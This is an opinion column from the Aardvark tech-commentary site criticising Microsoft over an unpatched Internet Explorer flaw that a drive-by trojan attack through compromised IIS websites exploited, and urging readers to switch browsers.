Sponsor's Message

However, I find it impossible to defend Microsoft in any way after the events of this past weekend.

As documented by any number of stories on the wires (the MSNBC story I've linked to in the news section below provides a good summary), it seems that a cracker or group of crackers launched what must have been the most undodgable MS-specific exploit to date.

Indeed, as a result of this exploit, the average web-surfer was completely vulnerable to having their PC hijacked and loaded up with malware. All they had to do was connect to the Net and surf to the wrong website. And here's the kicker -- that "wrong website" need not be some obscure cracker's page with the name "i0wnUd00d.asp" -- in fact it could have been the pages of any number of highly respectable and otherwise trustworthy websites.

Normally it's pretty easy for Microsoft to roll out the defence that it's only users of unpatched software who are vulnerable to any particular attack -- but not in this case.

That's because the exploit relies on at least one unpatched vulnerability in the company's Internet Explorer browser -- a vulnerability that has been known about for some time but was seemingly ignored by the update team.

Now have your say Got something to say about today's column, or want to see what others think?  Visit The Forums While you're here, why not visit the Aardvark Hall of Shame and perhaps make your own nomination.

What the crackers did was to identify an unknown number of websites using on unpatched versions of IIS and then exploit a known vulnerability to add code which embedded some Javascript into each page those servers dished up.

That Javascript contained code that subsiquently exploited the unpatched vulnerability in IE to automatically load a trojan from a Russian cracker's website. That trojan effectively gave the cracker access to the PC for the purposes of keylogging, spam relaying or whatever.

By knocking out the cracker's website, the threat posed by this particular villain has been defused but as we all know, there are probably dozens of other crackers out their right now already doing the same thing.

So why haven't Microsoft patched this IE vulnerability and what are they doing about it?

Well it seems that their sole response has been to refer users to this page.

I'm sorry, but this is kind of like Mitsubishi advising that the brakes could completely fail without warning on their fastest sports sedans and then suggesting that the fix is for people not to drive too fast in the meantime.

And, as we all know, this won't be the last such vulnerability to appear in IE which, when compared to other offerings such as Opera and Mozilla/Firefox is rapidly showing its age.

I strongly suggest (again) therefore, that people wake up to the fact that using IE is the cyber-equivalent of taping a "kick me" sign to the backsides.

If the feature benefits alone aren't enough to convince you to switch then stop and remember that right now you, your mother, your girlfriend and all your loved ones who might be using IE may be just a mouse-click away from the next implementation of this exploit.

Do yourself and them a favour -- get off the IE bandwagon now!

When the LTSA discovered that some Mitsi's might suffer a total brake failure they ordered them off the road -- is it time to order IE off the web?

If you feel that this is a good thing and/or you hold a "geniune affection" for yours truly -- then you are welcome to gift me some money using the buttons provided. In gifting this money you accept that no goods, service or other consideration is offered, provided, accepted or anticipated in return. Just click on the button to gift whatever you can afford. NOTE: PayPal bills in US dollars so don't accidentally gift more than what you were intending :-)

Contacting Aardvark
I'm always happy to hear from readers, whether they're delivering brickbats, bouquets or news tip-offs. If you'd like to contact me directly, please this form. If you're happy for me to republish your comments then please be sure and select For Publication.

Other media organisations seeking more information or republication rights are also invited to contact me.

Just add a couple of lines of JavaScript to your pages and you can get a free summary of Aardvark's daily commentary -- automatically updated each and every week-day.

Aardvark also makes a summary of this daily column available via XML using the RSS format. More details can be found here.

Contact me if you decide to use either of these feeds and have any problems.

Linking Policy
Want to link to this site? Check out Aardvark's Linking Policy.

Did you tell someone else about Aardvark today? If not then do it now!